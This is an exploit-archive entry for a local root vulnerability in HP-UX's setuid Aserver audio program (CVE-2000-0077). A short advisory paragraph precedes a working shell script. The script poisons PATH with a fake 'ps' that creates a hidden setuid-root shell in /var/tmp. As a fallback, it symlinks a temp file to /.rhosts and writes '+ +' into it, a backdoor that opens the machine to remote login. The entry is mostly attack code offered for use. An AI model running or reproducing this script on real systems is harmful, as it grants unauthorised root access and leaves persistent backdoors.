source : http://www.securityfocus.com/bid/1929/info Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default. During normal execution, Aserver executes "ps" via the system() libcall, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root. This is a trivial root compromise. #!/bin/sh # # HP-UX aserver.sh - Loneguard 18/10/98 # Simple no brainer path poison followed by a twist [ inspired by DC ;) ] # cd /var/tmp cat < _EOF > ps #!/bin/sh cp /bin/csh /var/tmp/.foosh chmod 4755 /var/tmp/.foosh _EOF chmod 755 ps PATH=.:$PATH /opt/audio/bin/Aserver -f if [ -e /var/tmp/.foosh ] # Hmmm, you not like that technique? cd /tmp rm last_uuid ln -s /.rhosts last_uuid /opt/audio/bin/Aserver -f echo "+ +" > /.rhosts # Haha, my Kungfu is the best! fi echo Crazy MONKEY!
Related ExploitsTrying to match CVEs (1): CVE-2000-0077
Trying to match OSVDBs (1): 9610
Other Possible E-DB Search Terms: HP-UX 10.x/11.x, HP-UX 10.x, HP-UX